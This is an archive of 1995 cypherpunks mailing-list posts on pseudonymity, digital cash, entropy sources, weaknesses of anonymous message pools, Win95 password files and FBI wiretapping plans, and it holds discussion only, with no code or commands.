example, who on the cypher punks list verified the posting made by the
people from MIT regarding Java?  Was it simply the trusted MIT name that
caused you to take int on faith?

One of the underlying assumptions of the scientific establishment, and
in fact science itself, is that results be published and verifiable, but
in reality, almost all results are not verified, and even the most
startling results aren't verified before many people begin to place
trust in them.

Example of a relatively quick response to such an assertion was the Cold
Fusion situation a few years ago.  On the other hand, the professor at
the University of Pittsburgh who published results based on faked data
(this is a gross simplification, I know) was widely believed for many
years.

The fact is that, today, there are simply too many results to verify
them all along with the underlying data they depend on, the software
used to generate them, etc.  As a result, we are increasingly left with
trusting the people rather than the results.  Another issue is that the
resources required to reproduce "big science" are not available to most
people.  Has anyone reproduced Adleman's experiments on bilogical
computation? I know of nobody that has, and would love to do it myself,
but I don't have the necessary equipment.  This is an Earthshaking
result with enormous long-term consequences, and I'm certain it's right
because I agree with the underlying theory and don't see any reason for
anyone to lie about it, but if Nostragnia of the Crydon Republic had
published it anonymously, I would be much more hesitant to accept it
and so would you (all).

> > In fact, how can we know that the original pseudonym still
> > applies? Someone could kill you and take over your pseudonym, and even
> > though we might hear of your death, the pseudonym might continue based
> > on your reputation but with another actual source.
> 
> Of course, the is-a-person problem has been discussed at great length. 
> Digital signatures are as effective for pseudonyms as for anyone else.
> The messages we've seen "from Alice de `nonymous" might all have come from
> different senders. They exhibit a common tone and style, but that doesn't
> assure us of anything. In a sense that makes them more inviting,
> since there's always the chance that a third party is attempting a clever
> parody or a sly bit of character assassination.

The question is not whether the signature is right, but rather, are
there other reasons to believe or not believe - trust or not trust -
etc.  the sender.  The less anonymity, the better this is revealed.

> [...]
> > It's an interesting concept that each statement should/could be taken on
> > its own and evaluated independently of the rest of a person's life
> > context, but in my experience, that has serious problems.
> 
> In my experience, that's about all I can usually do in network communication.
> In principle I _could_ devote scads of time to background investigations of
> my correspondents, for all except strongly anonymous and strongly 
> pseudonymous parties, but I don't find that approach realistic.

The point of non-pseudonyms is that if you want to know you can try to
find out.  If others know additional relevant information and decide to
reveal it, you can tell that much the better.  It also reuces blatant
character assasination (which brings some level of civility) and forces
people to take personal responsibility for what they say and do.  All
of these things, in my opinion, increase integrity.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Fri, 3 Nov 1995 09:54:36 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: alt.anonymous.messages considered harmful
In-Reply-To: <199511021625.RAA17800@utopia.hacktic.nl>
Message-ID: <199511022113.QAA23862@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Name Withheld by Request writes:
[re: problems with the Usenet newsgroup model of pseud/anonymous message pools]
> Denial of service attacks could be made somewhat less feasible by
> making the pool accessible as a mailing list and via http.

Mailing lists of course suffer the problem of strictly limited participation.
The web approach might work better, in some future with better privacy-
protecting infrastructure in place. Specifically, if HTTP transactions with
a popular web server were routinely encrypted, then all reasonably long
visits to that site would act as cover traffic for a message pool on that
server. As a bonus, you could have a spiffy form on the web page that
searches the pool for you. 

In any event, the server could log your exploration. This returns us to the
issue of strongly anonymous web proxies. (And we could imagine 
countermeasures, like daemons that search for randomly selected pseudonym tags
to muddy the waters. As Tim might say, lots of issues.)

Also, the mention of "as a mailing list _and_ via http" is significant. Making 
the pool available in multiple forms seems to be an unconditional benefit.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 3 Nov 1995 06:19:20 +0800
To: dreschs@mpd.tandem.com (Sten Drescher)
Subject: Surviving DNS disruption
In-Reply-To: <199511022000.OAA09507@galil.austnsc.tandem.com.>
Message-ID: <9511022120.AA15892@all.net>
MIME-Version: 1.0
Content-Type: text


Sten Drescher opined:
> sameer <sameer@c2.org> said:
> 
> >>  Is it?  This is the _one_ thing in the article (is that term giving
> >> it too much legitimacy?) that I whought was barely true.  Whoever
> >> controls the root level DNS servers effectively controls the
> >> Internet.  I postulated a couple of months ago about how the US Govt
> >> might attempt to censor the rest of the world: "Remove
> >> lurid.porno.site.other-country from your DNS system within 72 hours
> >> or we will remove references to your DNS servers from the root level
> >> servers.".  (I also speculated that if the US Govt tried doing this,
> >> that an 'underground' DNS system would form almost immediately.)
> >> 
> 
> s> 	The US govt. doesn't run the root nameservers, nor are all the
> s> root nameservers within US jurisdiction.
> 
> 	Granted, the US Govt doesn't run the US-based root servers.
> But, if an Internet 'Decency' law was passed, they certainly could try
> to threaten the US-based root server maintainers to make the cascading
> threats.  And, as I understand the way DNS resolution works, address
> requests go down to your root domain then up from the other root domain,
> i.e., for me to find out what c2.org's address is, my system requests
> from:
> NS mpd.tandem.com
> NS tandem.com
> NS com
> NS org
> 
> If this is correct, if the com NS has the entry for the org NS, I won't
> be able to resolve those names.  Of course, explicit IP addresses and
> /etc/hosts entries would still work.

We all know that an alternative DNS structure would rapidly appear, and
perhaps even a second US (black) Internet - with links between the old
and new fully automatic and transparent.  However, perhaps a good
cypherpunks project would be to create and test a contingency plan and
start an alternative DNS system in parallel with the government run ones.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 5 Nov 1995 20:08:23 +0800
To: ecm@ai.mit.edu
Subject: e$: 24 Hours
Message-ID: <v02120d00acbedcdd34fe@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

e$: 24 Hours

Yesterday, I had probably the most amazing day I've had in a very
long time. As the day revolved around e$, strong crypto, cryptoanarchy,
Macs and the life on the internet, I thought I would share it with you.

6:00
     Got up before the alarm. Carol, my wife, dropped me off at the gym,
     where I hadn't set foot in about 6 months. Started up yet another
     new exercise program. Did a lot of big muscle stuff, like squats
     and deadlifts -- now I can't climb stairs so well for a while. Shaved
     off yet another unfinished goatee (3rd time in 6 weeks) because I
     had to be presentable in public today.

9:30
     Showed up at the speaker's desk at Infoworld Boston, got
     credentialled and went to find David Fox's session on transaction
     methods. Had some time before, so I ran down to the floor and
     weaseled an Apple Internet guy named Tom Bartlett into shooting a
     picture of me with a QuickTake so that Vinnie Moscaritolo, another
     friend at Apple, wouldn't have a picture of him holding a scrawled
     sign saying "Bob: send me a GIF for this!" on the e$ web-page he's
     building for me at http://www.webstuff.apple.com/~vinnie/Rah/ . I
     had Tom e-mail the GIF to me from the floor, and ran back to
     the session, with 5 minutes to spare.

     The session got about 300 attendees, who listened to presentations
     from Pierre from First Virtual, Cliff from Open Market and Mike
     from Checkfree, and then I got to talk a bit.

     I had never spoken to a convention before, and here I was batting
     cleanup after all the pros pitched their stuff. David Fox introduced
     me as a "Wild Card", and I did my best to help him out. We were running
     late, but after asking them to get up and stretch after sitting
     through 2 hours of dog-and-pony, I asked the audience how many
     people people were from Boston, and told them about The Boston
     Society for Digital Commerce and when the meeting was. I then asked
     them how many of them had ever sold a car, and then asked them whether
     they took MasterCard from the buyer, and got a nice laugh.

     I told them that I thought that digital commerce *was* financial
     cryptography, and that most people settling trades on the net were
     just figuring that out. I told them to go out and buy Applied
     Cryptography by Schneier, and Out of Control by Kelley. I told them
     about the difference between certificate-based and book-entry
     transaction systems. I told them about Tim May's idea of
     Crypto-Anarchy, and about the Cypherpunks.

     Finally I asked them to imagine a world where instead of needing to
     enforce copyrights and patents, a developer's code would simply
     refuse to run periodically without a digital receipt saying that
     some specified amount had been paid, to the developer, preferrably
     in cash. I told them about Digicash, Mark Twain Bank, and about
     how important that was, even if it was a bumpy first start.

     At question-and-answer time, a guy from Germany asked us about the
     ITARs, regulatory restrictions on international transactions, and
     deutchmark-denominated business. All of the other presenters allowed
     that while that was hard, they had patches or were working on it, and
     that regulations were a problem. I talked about Eric Hughes' idea
     of regulatory arbitrage, how John Gilmore said that the internet saw
     censorship, and by extension arbitrary regulation, as damage, and
     routed around it, and I said that the folks at Mark Twain and
     Digicash had seen this as a problem and set up their system to be
     denominated in one of 5 currencies, including marks.

     I picked up about 10 cards from people who wanted to come to lunch at
     the Boston Society for Digital Commerce. (Plug: The first Tuesday of
     the month at the downtown Harvard Club. This month's speaker is Win Treese
     from Open Market, on how to design systems for digital commerce. E-mail
     me for details.)

     In addition, I saw BSDC member Dave Lash, a real-estate mogul turned
     web-fanatic who told me how to clean up my presentation style for next
     time.

2:00
     After schmoozing, and trying to find a bank to cash a check. I met
     David Fox and his web guy (forgot your name, sorry) on the trade
     floor in front of the Netscape booth, which was about 20% the size
     of the IBM booth, and was blocking the aisles so much that the fire
     marshall was giving them grief for it.

     We then went to see Jim Phillips at Security First Network Bank.
     SFNB is in Atlanta, and while the likes of Citicorp and Chase were
     putting together proprietary, dial-up, bank-by-phone systems, Jim
     went ahead and did his stuff on the web for some rediculous fraction
     of their costs. They were the only bank there. They had this tiny
     booth way back in the corner, and they were also a fire marshall
     problem. Jim was talking to a guy from California somewhere about
     setting up an account right then and there.

     I told Jim to expect a visit from my anonymous digital signature
     law source "Irwin" , (for Irwin Cory, The World's Foremost
     Authority, RIP), who had asked me earlier in the week about SFNB,
     and how to get ahold of them.

     Then, David, who was the original Aldus and Radius distributor in
     Australia before moving here a few years ago, went around lining up
     sponsors for his WWW pre-tradeshow tradeshow which in turn evolved
     out of his tradeshow directory business.

     While we walked around, I talked to David some more about e$pam, my
     idea for building a group of three e$-mail lists (a filtered list of
     other e$-ralated sources, an unmoderated "watering hole", and a
     newsletter), and we agreed to talk more about it on Friday sometime.

3:00 Cashed a check from my first-ever writing sale, a longish rant
     entitled "The Geodesic Network, OpenDoc, and CyberDog", which
     originally was posted to apple-internet-users, was cross-posted by
     bunches of other people in the Mac world to other e-mail lists all
     over the place, got me fan mail from the likes of Kawasaki, Alsop,
     Petreley, and various Apple Vice Presidents, and was even cited in a
     New Zealand law journal. An editor from InfoWorld bashed it from
     a 20kb rant down to a feature article of about 1300 words, and it
     will appear this Monday in the November 6th issue.

4:00 Went to see a client, who is the CFO for a famous, er, beauty salon,
     with about 50 salons world wide. I sort of core-dumped at him about
     how someday he could send his e-mail his cash to the home office in
     London every night. He's seen me like this before, so he didn't
     quite think I was from Mars...

5:45 As a lurker on the internet-marketing list, I got invited to a
     party at Bob Metcalfe's 5-story Back Bay townhouse. I had recruited
     Julie Rackliffe, a friend of mine in "Development" at the Computer Museum,
     to come along so I would know at least one person there. When I got
     there, I saw Dave Lash again. Small world.

     Besides the usual groceries, Bob had a big bunch of posterboard on a
     on his dining room table, and another piece of posterboard on his
     fireplace mantle. There were a bunch of questions on the table's poster,
     and one was about winners and loosers. I said that digital
     financial certificate underwriters would be the winners, and that
     loosers would be companies which depended on large information
     hierarchies. There was a question about anonymity, and I quoted
     Gilmore on network damage again.  On the fireplace mantle was this
     posterboard with an org chart with business-card sized blank boxes
     all over it. One side of the pyramid said "Client", the other side
     said "Server", and so I drew a big cloud off to the side with the
     label "Crypto-Anarchist" in it, and put my card there. A few people
     moved their cards into the cloud. I was rather pleased with myself...

     I went upstairs where I met John Levine, who was in the PBS internet
     special last year, and Margy Levine Young, who wrote "The Internet for
     Windows for Dummies Starter Kit" in a room with a Windows box, a bonded
     ISDN connection and a wall projector. I showed a few people the e$
     web-page, met the author of the refrigerator magnets page, and found
     out the John and Margy were fellow Unitarians, and that Margy's husband
     is the UU webmaster. We're everywhere, we're everywhere.

     I went up to the third floor, where by that time they were serving
     coffee and dessert, and Bob Metcalfe was there reccommending desserts
     to people. By that time I was talking to a trust officer at a very
     large institutional trustee bank here in Boston about how to
     underwrite digital cash. This guy was sympathetic because what he
     really wanted to do was chuck it all and go to work for Open Market. I
     told him that the next best thing was to let me come in and evangelize
     his bank a bit. He agreed. Dubiously. Anyway, He wants to come to
     lunch at BSDC, probably to schmooze the Open Market folks.  So while
     I was standing there waiting for coffee, I told Metcalfe about
     getting a feature article into his magazine.  One thing led to
     another, and the next thing I know, we're up another flight of
     stairs, and I'm dumping core again, this time about 10 steps from
     ARP-1, the original ARPANet transponder.  Oh. Metcalfe uses a Mac,
     even though his internet feed is to a Wintel box.

     Metcalfe first starts off with a few coy questions about Phiber
     Optik, and Phil Zimmerman, and he figures out that my interest in
     cryptography is pretty much in its financial implications. So, for the
     better part of half an hour, he's quizzing me about stuff like
     digital cash, digital certificates and financial disintermediation,
     and pretty much the whole geodesic market rant.  He says he likes
     "Mr., Doctor, Doctor, Huber's" stuff, a reference to Huber's
     hypercredentialed resume.  He talked about these crazy people who
     were creating a secondary market in Digicash's beta certificates,
     so I told him about Lucky Green, Rich Lethin and how all of us
     created ecm.

     I told Metcalfe about reputation capital, and, when he talked about
     the evils of anonymity, I talk about how on the net, a key pair *is* your
     identity, and about Tim May's cryptoanarchy stuff.  I told him about
     BSDC and asked about him speaking sometime, but he says he's working
     on a conference and a book, and his wife will kill him if he starts
     making speeches again.  He wanted on the BSDC list, though, so I'm
     going to subscribe him and see what happens. I also said I'd mail him
     the e$ URL.

10:45
     I get home and after telling Carol all about my day, I still can't
     sleep, so I jump on the net and filter cypherpunks for buyinfo, and
     then answer some mail from my college roomate, who found me last
     week.  He's a commander in the Navy who's now flying planes at
     McMurdo Sound in Antarctica.  I shot him back a message and told him
     about the e$ web-page, which he's going to have to sneak into another
     office to look at some other night, ;-), and I told him that I was
     writing this and would send it to him when I was through.

     I still wasn't sleepy, so I plinked on the development version of the
     e$ page with the new picture, and when I was done with that, I read
     news, and, in reply to a comment I posted on soc.culture.alaska (I
     spent middle school in Anchorage), I get a reply from Mr. Pickett, my
     7th and 8th grade science teacher, and my favorite science teacher on
     the whole planet.  Since I had just put a picture on my web-page, I
     put the development page's URL on the message so he could see what I
     looked like now.

1:45
     I finally go to sleep.




Cheers,
Bob Hettinga

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJkyyfgyLN8bw6ZVAQFVAAP/Xmkp7H28Q/DfRCqMWiYboEo53T84hOIP
n6pM/jjC1XAqf9E1v/i5PRQmCylyoJELEzsq3ET02bs4Wi25tS80dcm6oMHoHtAn
1SFCr6hHGIOxmLPJ+XnKCJgpKZEheLGqsG50ZEos26kQ3O4hD3bjZr5WcEyYFAGi
38i5yTwXR9A=
=fKyZ
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 3 Nov 1995 07:13:18 +0800
To: tcmay@got.net
Subject: Sources of randomness
In-Reply-To: <199511021940.LAA00300@comsec.com>
Message-ID: <9511022143.AA26596@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Thu, 2 Nov 1995 00:39:29 -0800
>From: tcmay@got.net (Timothy C. May)

>Digitized video input, especially from something like a noisy channel (t.v.
>channel, for example), is quite likely to produce a lot more entropy bits
>per second than nearly any of us ever need. (One's PGP key could be seeded
>in a fraction of a millisecond, for example.)

My cable feed into my Mac, for example, has surprisingly little noise --
and it's only local noise (stuff only at my house, not available to the
eavesdropper) which counts as entropy.

>  One of the basic ideas we
>have had, as Cypherpunks, is to encourage widespread methods. Any methods
>that need special hardware tend to not get widely used.
>
>Audio, video, disk timing, and all sorts of other sources of physical
>randomness are useful to have, but most people either won't have the right
>configuration or won't configure their systems so as to use their
>configuration.

Most Macs and PCs have audio inputs.  Most of those are mono,
unfortunately.  [The numeric difference between two stereo mics is
especially hard for an eavesdropper-wannabe to predict/compute, assuming
the room isn't silent.]  However, if the eavesdropper doesn't have a mic in
your room, there's still some entropy available on the mono channel.

Meanwhile, my old Sparcstation 1 had an A-D which, when no mic was
connected, gave about 1 bit/second of entropy.  (The newer Sparc here gives
solid 0's with no mic.)

Recorded audio is useless as entropy, of course.


Almost all computers have a mouse and a normal signature, hand-written with
a mouse, has great gobs of noise.  (I'm still working on the little PC
program to measure this -- but preliminary results show a minimum of 1 bit
of noise per mouse sample -- or 200 bits per signature.  Final results may
get higher entropy rates, but I'll wait for the real results before
claiming that.)


+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lvhove&vnet3.vub.ac.be@vnet3.vub.ac.be (Leo Van Hove)
Date: Fri, 3 Nov 1995 00:32:25 +0800
To: cypherpunks@toad.com
Subject: Info needed on observers
Message-ID: <v01530501acbea2598fe2@[134.184.16.171]>
MIME-Version: 1.0
Content-Type: text/plain



                               ////
                              (. .)
___________________________o00-(_)-00o___________________________________

Hi,

I am currently preparing a paper on payment systems for the Internet
and related issues.  I recently found out that so-called observers could
be placed on smart cards (in order to prevent double spending, or even to
prevent people from cheating on taxes...).

To be honest that's about all I know about observers and I am very eager
to find out more.  I am, however, having a hard time finding interesting
references on this subject.

Hence, all suggestions to get me started would be extremely welcome.
Questions of particular interest are: possible functions (and limits),
how 'real' are they already?, what about privacy?, ...

Many thanks in advance.

leo

_________________________________________________________________________
Leo Van Hove

Centre for Financial Economics
Vrije Universiteit Brussel (Free University of Brussels)
Pleinlaan 2
B-1050 Brussels
Vox: +32 629.21.25
Fax: +32 2 629.22.82
e-mail: lvhove@vnet3.vub.ac.be
_________________________________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 3 Nov 1995 08:07:14 +0800
To: ecm@ai.mit.edu
Subject: Re: e$: 24 Hours
Message-ID: <v02120d00acbeecc5a243@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>     Showed up at the speaker's desk at Infoworld Boston, got
                                         ^^^^^^^^^Internet World Boston
Ack. Spam the planet and then typo the first paragraph.

Sorry.

Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Thu, 2 Nov 1995 15:10:25 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Hit-and-Run Anonymous Posts (Re: "Dr." Fred)
In-Reply-To: <acbcfb6801021004664c@[205.199.118.202]>
Message-ID: <199511020706.AA20612@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>Pseudonyms are another matter entirely. Some are classy (Pr0duct Cypher,
>Black Unicorn, Lucky Green), some are oafish (S Boxx), some are ephemeral.
>Persistence of the identity, as when backed by digital signatures, is
>important. (Though not essential, yet.)

You forgot (how could you?!??) BIFF!!!

:)
Mark




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Fri, 3 Nov 1995 10:25:34 +0800
To: llurch@networking.stanford.edu (Rich Graves)
Subject: Re: Win95 password caching
Message-ID: <199511030120.RAA06496@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I was under the impression that MS used some variation of DES for encrypting
the password lists (obviously much more secure than the nonsense XOR
encryption used for the screen savers).

Joel

>This was not the question. He wants to prevent local Windows passwords
>from being created for network-only users. This is a serious security
>issue, because if a user enters her real network password for the Windows
>password, and someone else later picks up the .PWL files, which are not
>encrypted in a particularly secure way, then someone can get unauthorized
>access to the network as the previous user(s).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Name Withheld by Request)
Date: Fri, 3 Nov 1995 01:29:39 +0800
To: cypherpunks@toad.com
Subject: alt.anonymous.messages considered harmful
Message-ID: <199511021625.RAA17800@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


alt.anonymous.messages considered harmful.

The advantage of using an anonymous message pool over using a chained
reply block is, of course, the huge number of potential recipients.
However, there are a number of problems, including a serious attack.
Some of them could be avoided with a slightly different approach.



1. When reading news on a server not under her direct control, Alice
lets leak information (article selection, time used per article),
so that she loses the additional security of using a message pool.
She can avoid this by processing alt.anonymous.messages off line.


2. By sending messages of a certain size and number to a pseudonymous
address, an attacker can find out that the pseudonymous user
participates in the pool: The encrypted messages are public;
encryption does not affect size and number of messages.

This information is also available at the alias server. That is not a
problem as such. Anonymity is protected by the size of the pool.

In combination with 1., this attack can lead to disclosure of a
pseudonym.


3. Denial of service attack. If the attacker can delay or suppress
delivery of messages to a subset of the recipients, the pseudonym's
reaction to the message or lack thereof reveals which subset the user
belongs to. He can track down the pseudonym to Alice with O(log(n))
messages.

This is a practical attack, not restricted to a single point of failure
such as the local news server: Persons at well-connected Usenet sites
can send cancel (or superseding) messages with restricted distribution
by use of the Distribution: and Path: lines.

Those who do get the message, can not notice a cancel attack; those
who don't, would have to carefully search for suspicious Supersedes:
lines and monitor the control newsgroup. A denial of service attack by
manipulated Path: header cannot be detected by the victim.



Denial of service attacks could be made somewhat less feasible by
making the pool accessible as a mailing list and via http.
Some problems not related to security (such as restricted availability
and bogus cross-posted traffic in the newsgroup) could also be solved
by reproducing the encrypted posts to alt.anonymous.messages in a
mailing list.

Identification of encrypted messages as needed for 2. and helpful for
3. can be prevented by using a fixed-size message format and inserting
cover messages.

If these messages are numbered and signed by the alias server, users
can detect denial of service attacks (but not distinguish them from
network errors) and try to get the messages through another channel.

For perfect security, however, feedback from all participants would be
required during transmission of the message. This is hardly possible.
So, for highest security return addresses, an "everyone a remailer"
mix net might be the better solution.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 3 Nov 1995 08:33:41 +0800
To: cypherpunks@toad.com
Subject: Re: ecash remailer
In-Reply-To: <9511021209.ZM7820@morgan.com>
Message-ID: <9511022231.AA08841@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>So, refuse to buy their money.
>Demand open systems.

One problem a number of people have reported in DigiCash is disappearing 
money. Several people have reported that if a transfer is misconfigured
the cash can flow out of the wallet, be rejected at the other end and
disappear from the system - i.e. misprinted names on cheques mean lost cash!

This is bad and they report that Digicash did not respond to their
complaints.

	Phill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 6 Nov 1995 08:06:51 +0800
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: FBI seeks huge wiretapping system
In-Reply-To: <9511021924.AA12407@alpha>
Message-ID: <199511022239.RAA06803@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike McNally writes:
> 
> hallam@w3.org writes:
>  > It is a fair point that just because technology has changed the 
>  > nature of the game it should not mean that wiretaps cease to be 
>  > possible.
> 
> I disagree that this is a "fair point".  That wiretaps are possible is
> an accident of design.  Just because that slice of the salami appears
> gone, I see no reason to concede that it can't be re-attached.

Indeed, I have searched both the constitution and my collected works
of Nietzsche and found no reference to the inalienable right of
governments to listen in on any conversations, let alone the 1% of
conversations the FBI wants access to. By the way, I believe the
quantity in question exceeds the quantity tapped by the East German
government at its height -- certainly it does if you take into account
the fact that phones were more scarce there.

Thank you, Louis Freeh, for taking another step towards the police state.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 4 Nov 1995 21:18:59 +0800
To: cypherpunks@toad.com
Subject: Re: FBI seeks huge wiretapping system
Message-ID: <199511030140.RAA05160@ix11.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:09 PM 11/2/95 -0500, Phill Hallam wrote:
>On telephone tapping the statement was made that they do not allow 
>unauthorized taps and that technology was making wildcat taps by
>local officials harder. Which makes sense. 

At least for the moment, wildcat taps have become much easier,
since radio-tapping cellular phones is straightforward.

>It is a fair point that just because technology has changed the 
>nature of the game it should not mean that wiretaps cease to be 
>possible.

Back before telephones, you could steam open someone's mail if they
sent it by the government post, but it was a lot harder if they sent it
by private messengers, and they could always send it in some
pre-arranged code.  And you could always hang out under the eaves
of their houses listening for conversations, but they could always
check for themselves or talk while walking down the street.
It's a fair point that just because technology has made it easier for
eavesdroppers and mail-snoops today doesn't mean that private
conversations should cease to be possible, or that we shouldn't be
able to use technology to preserve the security of our papers and effects.

>What is very odd however is the FBI request for $500 million. This is
>a somewhat large quantity of money to say the least. The telephone
>switches are programmable these days, it should be possible to 
>provide tapping at substantially less cost. 

$500 million is a drop in the bucket; they're talking about wedging themselves
into multiple places in the telephone system, taking up to 1 percent of the
capacity (without compensation as near as I can tell), and they want
the ability to do all this without the inconvenience of going out to
telephone wire offices where somebody might ask to see a warrant.

>Mind you the Federal government is not known for tight cost control. 
Indeed :-)

>The NSA reconned that a DES cracker would cost substantially more than 
>$1 million because the system costs would be much higher than the component
costs.
.... 
> Anyway the NSA price estimate was "two or more orders of magnitude more in
cost"

Wiener's design was about two orders of magnitude cheaper than Wayner's
and the DEC guy's designs, which were in turn far cheaper than any previous.
But it's a believable design, and could probably be done within a factor of
two-three of his cost predictions; "system costs" need to include things
like wiretapping equipment to steal and record the data to be cracked,
and government employees to operate it, and bureaucrats and politicians
to tell them what to do and who to target, and lots of real estate for them all.
But to reach two or more orders of magnitude cost increase,
I'd think you'd need a far bigger collection of cracking machines
that Wiener's - perhaps to crack a few hundred keys per day.

Interesting comments on banks' use of DES for authentication rather than
privacy....  of course, if the government wants to tap banks' conversations,
it can generally just demand that the banks tell them the information,
at least for US-based and other cooperative banks.

>If the NSA want a cheap DES cracker they have my number. I'll take 5%
>ot the difference between the actual cost and $100 million (their
>estimate of cost) as my fee.

As Rodney Dangerfield said "Well to start with, you gotta throw in
10% for graft and corruption."


#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Fri, 3 Nov 1995 08:58:16 +0800
To: Cypherpunks mailing list <cypherpunks@toad.com>
Subject: Cypherpunk recruiting opportunity
Message-ID: <Pine.SOL.3.91.951102172127.15248A-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain



C-punx,

Considering the amount of "preaching to the choir" that goes on here I 
thought that the following news item might supply a more suitable outlet 
for some of the more evangelical-minded Cypherpunks.  After all, it is 
perfectly clear that the science of cryptography exemplifies some of the 
more exciting applications of otherwise-dry mathematics, and there is 
always a need for "voices of reason" in the councils of those who would 
make the 'Net safe for children.

___________________

Tech Help for Schools

While high-tech education visionaries are issuing apocalyptic warnings 
about the fate of the alledgedly backward US school system, a privately 
sponsored group has launched a Peace Corps-style initiative to ease 
schools into the 21st century.

The Massachusetts-based Tech Corps, which recruits volunteers to help 
schools harness computers and telecommunications technology, announced 
last month that it is going national.  The corps, whose chief sponsor is 
the Cellular Telecommunications Industry Association, will hold a 
conference in Washington DC on 30 October where people can learn how to 
start state chapters.  Founded by Gary J. Beach, chief executive officer 
of Computerworld Inc., the corps last year recruited 300 volunteers 
theough the magazine Computerworld who have been working in 12 school 
districts throughout Masachusetts.

Karen Smith, Tech Corps' national director, says the response to the call 
for volunteers from people in industry, government agencies, and private 
consulting firms, has been "incredible."  They help school districts in 
any way they are asked - such as by installing wiring, training teachers, 
persuading local industry to donate hardware, and helping schools 
construct World Wide Web homepages.

Interested parties can reach Tech Corp' own web page at:

http://www.ustc.org



C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 Nov 1995 10:00:07 +0800
To: Carl Ellison <cme@tis.com>
Subject: Re: Sources of randomness
In-Reply-To: <9511022143.AA26596@tis.com>
Message-ID: <199511022259.RAA06877@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Carl Ellison writes:
> Almost all computers have a mouse and a normal signature, hand-written with
> a mouse, has great gobs of noise.  (I'm still working on the little PC
> program to measure this -- but preliminary results show a minimum of 1 bit
> of noise per mouse sample -- or 200 bits per signature.  Final results may
> get higher entropy rates, but I'll wait for the real results before
> claiming that.)

I have a brochure from a company that sells RS232 interfaced radiation
monitors for only a couple hundred bucks. The things even come with a
RNG demo program.

(The company is "Aware Electronics")

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 3 Nov 1995 09:38:32 +0800
To: perry@piermont.com
Subject: Re: FBI seeks huge wiretapping system
In-Reply-To: <199511022239.RAA06803@jekyll.piermont.com>
Message-ID: <9511022308.AA08199@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Indeed, I have searched both the constitution and my collected works
>of Nietzsche and found no reference to the inalienable right of
>governments to listen in on any conversations, let alone the 1% of
>conversations the FBI wants access to. 

